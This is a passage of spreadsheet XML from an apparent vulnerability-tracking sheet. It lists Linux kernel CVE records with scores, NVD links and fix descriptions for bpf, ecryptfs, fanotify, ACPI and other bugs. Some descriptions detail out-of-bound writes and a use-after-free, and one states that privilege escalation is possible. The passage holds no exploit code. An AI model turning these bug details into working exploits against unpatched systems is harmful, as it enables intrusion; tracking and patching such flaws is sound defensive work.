      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr"/>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Harden bloom filter sizing and indexing on 32-bit kernels
bloom_map_alloc() has two 32-bit-specific problems when the computed
bitmap reaches the U32_MAX fallback case.
First, BITS_TO_BYTES(U32_MAX) is evaluated with 32-bit arithmetic. The
addition performed by DIV_ROUND_UP wraps, so the map allocates only the
fixed-size bloom filter object while keeping bitset_mask == U32_MAX.
Subsequent updates can then write past the allocated object.
Second, fixing only the allocation size is not sufficient. The bloom hash
is a u32, but set_bit() takes a signed long bit number and x86 test_bit()
eventually feeds the index to variable_test_bit(long, ...). On 32-bit
kernels, hashes in [0x80000000, U32_MAX] therefore become negative bit
offsets. x86 bt/bts with a memory operand interpret those offsets relative
to the supplied base, so a map with bitset_mask == U32_MAX can read or
write before bloom-&gt;bitset even after allocating the full 512 MiB bitmap.
Keep the U32_MAX fallback, but split each hash into a word pointer and an
in-word bit number before calling test_bit() or set_bit(). The bitops
argument is then always in [0, BITS_PER_LONG - 1], while BIT_WORD(h) still
selects the intended word in the full bitmap.
Compute the bitset size from (u64)bitset_mask + 1 before passing the final
size to bpf_map_area_alloc(). This fixes the original under-allocation and
keeps the allocated storage consistent with the addressable bitset.
Exploitation note: local privilege escalation is possible on a 32-bit x86
kernel using the under-allocation bug from a binary with CAP_BPF.</t>
        </is>
      </c>
      <c r="S389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89579</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89580</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr"/>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr"/>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Disable preemption in __bpf_get_stack
get_perf_callchain() returns a per-CPU perf_callchain_entry buffer and
releases its recursion slot via put_callchain_entry() before returning,
so nothing keeps the entry reserved while __bpf_get_stack() consumes
it below.
A preemptible BPF program (e.g. a non-sleepable raw tracepoint program
on a PREEMPT kernel, which runs under migrate_disable() but not
preempt_disable()) can be scheduled out between obtaining the entry
and the copy. Another task scheduled on the same CPU then reuses the
same per-CPU buffer and overwrites trace-&gt;nr with a larger value.
copy_len is then computed from the inflated trace-&gt;nr and can exceed
the caller's buffer, causing an out-of-bounds write in the memcpy()
and in the build_id path.
The rcu_read_lock() taken here alone does not prevent this. It is
only taken on the may_fault path, and under CONFIG_PREEMPT_RCU it does
not disable preemption; it merely keeps perf's callchain buffer array
alive (freed via call_rcu()) and does nothing to stop another task
from reusing the entry.
Disable preemption around obtaining the callchain entry and copying
it into the caller's buffer, so the entry cannot be reused underneath
us and trace-&gt;nr stays bounded by max_depth. Build ID resolution may
fault and is therefore deferred until after preemption is re-enabled;
by then the instruction pointers have already been copied into buf,
so it operates only on that private copy. Note, preempt_disable() also
subsumes the buffer-lifetime guarantee the rcu_read_lock() provided,
since a preempt-disabled section is an RCU read-side critical section
for the callchain buffers' call_rcu() reclaim.
[ changed Fixes: commit ]</t>
        </is>
      </c>
      <c r="S390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89580</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89581</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr"/>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, x86: Fix per-CPU address resolution into an extended register
The destination of the per-CPU address MOV is encoded in ModRM.reg,
which is extended by REX.R, but the REX prefix is built with
add_1mod(), which sets REX.B. REX.B extends ModRM.rm and SIB.base, and
this instruction addresses memory as disp32 with no base, so the bit
has no effect at all and the high register bit is simply lost.
Every is_ereg() destination therefore resolves to the wrong register,
picking whichever one shares the low three bits:
  R5 -&gt; RAX    R7 -&gt; RBP    R8 -&gt; RSI    R9 -&gt; RDI
With BPF_REG_5, whose reg2hex is 0, the emitted
  65 49 03 04 25 &lt;off&gt;	add %gs:&lt;off&gt;,%rax
adds the per-CPU offset to RAX rather than R8. The destination keeps
the unadjusted address and RAX is clobbered, so the program goes on to
dereference a pointer that was never made per-CPU:
  BUG: unable to handle page fault for address: 0000607e386a8894
  RIP: bpf_prog_707837aafd2aa9ae_update_percpu_data+0x93/0xc9
  Call Trace:
   __bpf_prog_test_run_raw_tp+0x2dc/0x7d0
   __flush_smp_call_function_queue+0x1e9/0xc80
  Kernel panic - not syncing: Fatal exception in interrupt
R5 is the mildest of the four, aliasing a scratch register and faulting
at the store. R7 aliases RBP and would corrupt the frame pointer, R8
and R9 alias the argument registers.
Use add_2mod() so the register goes through REX.R, matching how
add_2reg() places it in ModRM.reg and how emit_priv_frame_ptr()
hardcodes 0x4c for the same instruction with R9. Encodings for the
non-extended registers are unchanged.
Problem showed up when trying to resurrect BPF_GCC CI (selftests built
with BPF_GCC).
This has gone unnoticed because clang reloads the address into R1
before each per-CPU access, so the destination is never an extended
register. GCC keeps several per-CPU addresses live at once, and
test_progs-bpf_gcc panics the kernel in global_percpu_data/init, where
the address of a .percpu variable ends up in R5.</t>
        </is>
      </c>
      <c r="S391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89581</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89584</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr"/>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr"/>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
block: validate user space vectors during extraction
The bio-based drivers don't necessarily check the alignment split, and
stacking block drivers don't always handle a misalignment detected after
submitting the bio. Validate user vectors against the device's
dma_alignment as the bio is built from the iov_iter, rejecting
misaligned early with -EINVAL.</t>
        </is>
      </c>
      <c r="S392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89584</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89585</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr"/>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr"/>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
auxdisplay: charlcd: cancel backlight work on registration failure
With CONFIG_CHARLCD_BL_FLASH, charlcd_init() schedules bl_work before
charlcd_register() calls misc_register(). If registration fails, the
caller frees the charlcd object while delayed work still contains its
address.
Add charlcd_deinit() to cancel the delayed work and turn the backlight
off. Use it for both registration rollback and normal unregistration.</t>
        </is>
      </c>
      <c r="S393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89585</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89587</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr"/>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: pfr_update: fix stack buffer overflow in query_capability()
query_capability() copies four ACPI buffer objects returned by the
firmware _DSM into fixed-size u8[16] fields in struct
pfru_update_cap_info using memcpy with the firmware-supplied length:
  memcpy(&amp;cap_hdr-&gt;code_type,
         elements[CAP_CODE_TYPE_IDX].buffer.pointer,
         elements[CAP_CODE_TYPE_IDX].buffer.length);
The same pattern repeats for drv_type, platform_id, and oem_id.
If the firmware returns buffer.length &gt; 16 for any of these fields,
memcpy writes past the destination array.
struct pfru_update_cap_info is stack-allocated in pfru_ioctl().
Confirmed with KASAN on 7.2-rc6: three stack-out-of-bounds reports
are generated when a DSM returns 64-byte buffers, with writes reaching
44 bytes past the end of cap_hdr's [64, 156) frame window into
adjacent stack redzones.
Introduce a helper pointer to out_obj-&gt;package.elements and use it
to validate each buffer length against its destination field size
before copying, returning -EINVAL if the firmware supplies an
oversized buffer.</t>
        </is>
      </c>
      <c r="S394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89587</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89594</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr"/>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr"/>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hsi: omap_ssi_core: fix missing DMA mask setup for SSI controller device
The OMAP SSI driver uses a synthetic HSI controller device allocated via
hsi_alloc_controller(), which does not go through the normal OF/platform
device initialization path.
As a result, the embedded struct device does not have a DMA mask
initialized by default.
After recent DMA API hardening changes, dma_map_sg() and related helpers
now require a valid dma_mask to be present, otherwise the driver may
crash or trigger warnings when attempting DMA mapping operations.
Fix this by explicitly initializing the DMA mask for the SSI controller
device and setting a 32-bit DMA mask, which matches the hardware
capabilities.</t>
        </is>
      </c>
      <c r="S395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89594</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89597</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr"/>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: uvesafb: unregister connector callback on init failure
uvesafb_init() registers the v86d connector callback before registering
the platform driver. If platform_driver_register() fails, the function
returns the error directly and leaves the connector callback registered.
The later platform-device failure path already unregisters the callback.
Add the same cleanup before the final return when platform-driver
registration fails.
This issue was identified during our ongoing static-analysis research while
reviewing kernel code.</t>
        </is>
      </c>
      <c r="S396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89597</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89600</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr"/>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fanotify: fix use-after-free of file range info
fsnotify_pre_content() builds its file_range on the triggering task's
stack. fanotify_alloc_perm_event() saves a pointer to range.pos in the
heap-allocated permission event so copy_range_info_to_user() can report
the offset later.
The event reader can set the event state to FAN_EVENT_REPORTED and then
sleep while preparing the file descriptor. If a signal interrupts the
triggering task at that point, fanotify_get_response() changes the state
to FAN_EVENT_CANCELED and returns. This unwinds the file_range stack
frame while the reader still owns the event. The reader then dereferences
pevent-&gt;ppos and copies the stale stack value to userspace.
KASAN reported:
  BUG: KASAN: use-after-free in fanotify_read+0x293e/0x2970
  Read of size 8 at addr ffff88811434fc50 by task fanotify_inotif/95
  Call Trace:
   fanotify_read+0x293e/0x2970
   vfs_read+0x177/0xa20
   ksys_read+0xf7/0x1c0
   do_syscall_64+0xf9/0x540
   entry_SYSCALL_64_after_hwframe+0x77/0x7f
Store the range position directly in the permission event and use
FANOTIFY_NO_RANGE when range information is unavailable. The event remains
alive until the reader finishes, so the reported offset no longer depends
on the triggering task's stack.</t>
        </is>
      </c>
      <c r="S397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89600</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89602</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr"/>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: skip sufficiently large global buffers when resizing
z_erofs_gbuf_nrpages is advanced only after every global buffer has been
grown. If a resize fails after some buffers were enlarged, a retry
revisits those enlarged buffers.
Retrying the same size then returns -ENOMEM because alloc_pages_bulk()
has no pages to add and the unchanged return value is treated as a
failure. Retrying an intermediate size allocates a temporary pointer
array smaller than gbuf-&gt;nrpages and copies more existing pointers than
the array can hold.
Skip buffers that already satisfy the request. Once all remaining
buffers have caught up, advancing z_erofs_gbuf_nrpages again describes
the guaranteed minimum size across the pool.</t>
        </is>
      </c>
      <c r="S398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89602</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89605</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr"/>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: release message context on send failure
ecryptfs_send_message_locked() moves a message context from the free
list to the allocated list before sending the request to the userspace
daemon.
If ecryptfs_send_miscdev() fails, the context is left on the
allocated list and cannot be reused. Move it back to the free list on
failure and clear the caller's pointer.</t>
        </is>
      </c>
      <c r="S399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89605</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89606</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr"/>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: reject too-small tag 70 packets
ecryptfs_parse_tag_70_packet() subtracts fixed metadata fields from the
parsed packet body size to derive the encrypted filename size.  A
malformed packet with a body smaller than those fixed fields can underflow
that size calculation.
Reject tag 70 packets before the subtraction unless the body contains the
signature, cipher code, and at least one byte of encrypted filename data.</t>
        </is>
      </c>
      <c r="S400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89606</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89607</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ecryptfs: reject oversized encrypted_key_size in parse_tag_3_packet
parse_tag_3_packet() set encrypted_key_size from the Tag 3 packet body
without bounding it against ECRYPTFS_MAX_KEY_BYTES (64). When
encrypted_key_size &gt; 64, decrypt_passphrase_encrypted_session_key()
sets decrypted_key_size = encrypted_key_size and performs two
out-of-bounds writes:
1. crypto_skcipher_decrypt() writes encrypted_key_size bytes into
   decrypted_key[64] via scatterlist, overflowing into the parent
   ecryptfs_auth_tok struct.
2. memcpy(crypt_stat-&gt;key, decrypted_key, decrypted_key_size) writes
   into crypt_stat-&gt;key[64], corrupting root_iv, keysig_list, and
   mutexes in ecryptfs_crypt_stat.
Only AES-192 (cipher code 0x08) enables this because it sets
crypt_stat-&gt;key_size = 24 independently of encrypted_key_size,
allowing crypto_skcipher_setkey() to succeed while encrypted_key_size
exceeds ECRYPTFS_MAX_KEY_BYTES.
The PKI decryption path (parse_tag_65_packet) already validates
decrypted_key_size &lt;= ECRYPTFS_MAX_KEY_BYTES; the passphrase path
omits this check.
Bound encrypted_key_size against ECRYPTFS_MAX_KEY_BYTES (64) rather
than ECRYPTFS_MAX_ENCRYPTED_KEY_BYTES (512). The 64-byte limit also
protects the 512-byte encrypted_key[] buffer, so the former 512-byte
check is removed as redundant.
[tyhicks: Adjust the code comment to refer to macros representing the
 buffer sizes rather than mentioning the buffer size values since they
 may change in the future]</t>
        </is>
      </c>
      <c r="S401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89607</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89609</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr"/>
